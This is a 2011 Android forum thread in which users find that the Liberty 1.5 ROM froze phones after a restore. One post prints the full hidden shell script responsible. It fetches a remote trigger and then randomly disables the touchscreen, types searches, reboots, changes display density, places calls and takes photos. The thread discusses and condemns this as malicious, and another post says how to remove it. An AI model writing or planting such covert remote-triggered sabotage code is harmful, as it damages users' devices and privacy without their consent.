1. Are you ready for the Galaxy S20? Here is everything we know so far!
Thread Status:
Not open for further replies.

Root Liberty 1.5 possessed?

Discussion in 'Android Devices' started by ECFfighter7232, Feb 15, 2011.

1. ECFfighter7232

ECFfighter7232 Android Expert

ok, I know Im not nuts because theres a thread in another forum I dont belong to about this... but it just happened to me...
    I restored a backup of Liberty 1.5 (had to grab something from back on that backup that I lost when switching to apex) and the phone rebooted into liberty, i slid the bar across to unlock it, then the browswer opened automatically, googled "Liberty 1.5 awesome" then the screen stopped responding...
    hard buttons worked (power) but the screen wouldnt respond to any touch... WTF is going on with that? and it seems like quite a few people have had this issue...
    anyone else have this happen or have thoughts on this?

UPDATE: This issue has been resolved with the Developer's explanation.

Advertisement

2. Caveman419

Caveman419 Android Enthusiast

You are not crazy, this was just happening to me. Not sure what caused it or how to fix it. It took me about 6 or 7 tries to get it to the bootstraper app and get it into clockwork to wipe and install another backed up ROM (Tranquility). If anyone has any ideas, please share.

3. ECFfighter7232

yeah I have news on this, and if it turns out to be true I will be pretty pissed to be honest... give me a second to gather some quotes from the other forum and ill share them here...

4. Caveman419

I don't like the sound of that...but take your time.

5. ECFfighter7232

ok this post was from the other forum with information about why this is happening to people.... I dont know shit about scripts... but if im reading this right, not only is it tellling the phone to do this google search but also to call people randomly, and to take a picture randomly???!! really?!
    now from my understanding this has something to possibly do about keeping people from copying their stuff without giving credit... but I did nothing but retsore a backup... and this totally ****ed my phone until I was able to get it into recovery and luckily I had the apex zip on my phone to install and wipe everything out....
    something seriously isnt right here if this was meant as a joke on people and it makes there phone unusable for ANY period of time... I sent a tweet to both keljar and jrummy about this and havnt heard anything back yet.

Caveman419 likes this.
  6. jlewis74

jlewis74 Well-Known Member

I have been running 1.5 for a few days now without any problems. But I do want to know what the deal is!

7. jlewis74

jlewis74 Well-Known Member

While I am sure its not fun if it happens to you I can imagine the look on someones faces when it does. I think the devs are saying "Hey, we are the ones putting all the work in to these ROMS dont mess with them." But what do I know.

8. Aggie12

Aggie12 Android Expert

I don't think I'm okay with that if that is to be true. Not saying this is bad but if this is something implemented..is there anything else we should know of?

9. Caveman419

Wow...This is very surprising. Who put this code in there. I would not ever think that jrummy would have any part of something like this. I understand the whole thing about not giving credit for anothers work (whole UD situation). I will be very interested to see jrummy's take on this whole thing. Do you have a link to the other thread from the other forum?

10. k0smo86

k0smo86 Android Enthusiast

That's pretty ridiculous. I know that one dev pissed them off, but this is another reason I won't be using that ROM.

11. Xeneize480

Xeneize480 Android Enthusiast

I hope I never get that =)

12. cultldr

cultldr Android Enthusiast

Liberty 1.5 takes over my phone? - Droid Forum - Verizon Droid & the Motorola Droid Forum

Caveman419 likes this.
  13. ECFfighter7232

ok 1 I didnt mess with anything. I restored the rom from clockwork revovery like id done several times before. 2 its MY ****ing phone and if someone puts a hidden script onto my phone without notifying me that it can disable my phone for ANY lengh of time, I can not and will not support that developer and I would suggest everyone else to think about it strongly.
    like I said before, I do not know the true intension of this code but it has effected SEVERAL people today. so maybe Im jumping the gun, but im pissed as shit right now...

14. ECFfighter7232

it looks like jrummy is the one who wrote the script
    at the bottom of the script it says
    jrummy16 backwards

15. faber78

faber78 Guest

That's not cool. If they were gonna pull some shit like that they should have been sure it would never effect the typical end user. If this is true then someone had gotten to big for his britches. That = fail. The community will support the work of people who deserve it on their own.
    On a side note, had it not effected the regular user, it would have been funny. But jacking up someones phone that cost hard earned money cause your booby trap screwed the pooch is not cool at all.

Trooper likes this.
  16. Caveman419

Anybody that can write this script can code in something minor like that to point suspicion in any direction that they want. I am still holding out to hear from jrummy. He has been a pillar in Dev community.

Let's see how this unfolds. I am not happy by any means, but let the devs weigh in.

17. k0smo86

k0smo86 Android Enthusiast

I don't see how someone else could possibly have done this? Glad I am on Apex

18. ECFfighter7232

very true. if this happened to someone who was trying to screw with or copy someones work without giving credit (like what happened with that redone theme) then I could see it being funny... but seeing how this has effected a lot of people who did no such thing... the humor has been lost.

very true.... idk who else beside keljar or jrummy would have put that in there though... the only other changes to my liberty rom were battery icon changes that I made to it myself.

19. PatHoge

PatHoge Well-Known Member

Wow...this is ridiculous. After how Jrummy and kejar treated that dev who used the supposed "open source" code to improve on Liberty, I stopped supporting them and stopped using Liberty. And now this happens? I am so glad this did not happen to me, and if this really was Jrummy then I am extremely disappointed. This is not how the Android community should be run.

20. ECFfighter7232

heres another thing thats REALLY odd about this whole ordeal...
    it seems that it has only happened to people TODAY. I have read no reports of it happening to anyone before today.... theres got to be something to the date side of this as well... maybe a recent update that implemented this?

21. tom108

tom108 Android Expert

its a pretty interesting script. but simple to stop. just goto /system/lib/libgnakfoorp.so and rename or delete it using root explorer.

Trooper likes this.
  22. PatHoge

It is interesting...but very malicious.

23. Trooper

Trooper Android Expert

Just deleted it. Thanks tom. ;)

24. tom108

tom108 Android Expert

in a way yes.

here is what the scripts says:

Code (Text):
    1. # Why? 99% because it was fun as hell to make. 1% to mess with people's minds who try and remove credit :P
    3. SLEEP_TIME=3m
    4. URL=http://www.froyoroms.com/files/developers/jrummy/JRummy/testing/kangtest
    5. GNAK=1
    6. BB=busybox
    7. CHECK_POINT=/data/gnak
    8. OPTIONS=/data/.gnaksnoitpo
    9. PHONE_NUMBER=411
    11. gnak()
    12. {
    13.     if test ! -e /system/etc/product_of_liberty; then
    14.         while test -z "$(mount | $BB grep /sdcard)"; do
    15.             sleep 5s
    16.         done
    17.         $BB sleep $SLEEP_TIME;
    18.         sleep 3s;
    19.         $BB wget $URL -O $CHECK_POINT > /dev/nul 2>&1
    20.         if test "`cat $CHECK_POINT`" = "$GNAK"; then
    21.             sed -i 's|ROM version |KANG version|' /system/app/Settings.apk
    22.             listOptions
    23.             OPTION_COUNT=$($BB wc -l < $OPTIONS)
    24.             if test $OPTION_COUNT -gt 0; then
    25.                 RANDOM=$($BB hexdump -e '1/1 "%d"' -n 1 /dev/urandom)
    26.                 GNAK_NUB=$(($RANDOM % $OPTION_COUNT + 1))
    27.                 GNAK_FOORP=$($BB sed -n "${GNAK_NUB}"p $OPTIONS)
    28.                 NRAEL_TON_OT_GNAK=`echo $GNAK_FOORP | $BB sed 's/_/ /g'`
    29.                 $NRAEL_TON_OT_GNAK
    30.             else
    31.                 freezeIt
    32.                 googleIt wtf is going on
    33.             fi
    34.         fi
    35.     fi
    36. }
    38. inputText() {
    39. for word in "$@"; do
    40.     input text $word
    41.     input keyevent 62
    42. done
    43. }
    45. googleIt()
    46. {
    47.     freezeIt
    48.     am start -a android.intent.action.VIEW -d http://www.google.com
    49.     sleep 10s
    50.     input keyevent 84
    51.     sleep 1s
    52.     inputText $@
    53.     input keyevent 66
    54. }
    56. powerDown()
    57. {
    58.     case $1 in
    59.         bs) > /data/.recovery_mode;reboot;;
    60.         rc) reboot recovery;;
    61.         pd) reboot -p;;
    62.         rb) reboot;;
    63.     esac
    64. }
    66. freezeIt()
    67. {
    68.     echo 1 > /sys/module/qtouch_obp_ts/parameters/disable_touch
    69. }
    71. lcdMess()
    72. {
    73.     case $1 in
    74.         tiny) sed -i 's|.*ro.sf.lcd_density=.*|ro.sf.lcd_density=170|' /system/build.prop;reboot;;
    75.         big)  sed -i 's|.*ro.sf.lcd_density=.*|ro.sf.lcd_density=280|' /system/build.prop;reboot;;
    76.     esac
    77. }
    79. takePicture()
    80. {
    81.     while sleep 30m; do
    82.         am start -a android.intent.action.MAIN -n com.motorola.Camera/.Camera
    83.         sleep 2
    84.         input keyevent 27
    85.     done
    86. }
    88. pulldownBar()
    89. {
    90.     while test "this" != "fun"; do
    91.         input keyevent 83
    92.     done
    93. }
    95. homeScreen()
    96. {
    97.     while sleep 60s; do
    98.         input keyevent 3
    99.     done
    100. }
    102. callSomeone()
    103. {
    104.     am start -a android.intent.action.CALL tel:$PHONE_NUMBER
    105. }
    107. soundAnnoy()
    108. {
    109.     A=0
    110.     B=0
    111.     while sleep 2s; do
    112.         while test $A -ne 10; do
    113.             input keyevent 24
    114.             A=$(($A+1))
    115.         done
    116.         A=0
    117.         while test $B -ne 10; do
    118.             input keyevent 25
    119.             B=$(($B+1))
    120.         done
    121.         B=0
    122.     done
    123. }
    125. listOptions()
    126. {
    127.     cat > $OPTIONS << GNAK
    128. googleIt_urban_dictionary_kang
    129. googleIt_urban_dictionary_kang
    130. googleIt_liberty_rom_android
    131. googleIt_liberty_rom_android
    132. soundAnnoy
    133. soundAnnoy
    134. powerDown_bs
    135. powerDown_rc
    136. powerDown_pd
    137. powerDown_rb
    138. pulldownBar
    139. pulldownBar
    140. pulldownBar
    141. pulldownBar
    142. homeScreen
    143. homeScreen
    144. callSomeone
    145. freezeIt
    146. freezeIt
    147. takePicture
    148. takePicture
    149. lcdMess_tiny
    150. lcdMess_big
    151. GNAK
    152. }
    154. # yb: 61ymmurj

25. PatHoge

Yeah I read it. It's well done, no doubt about it. I'm not sure what the first block does. I know it will only run the script if the SD card is mounted but what's the next part?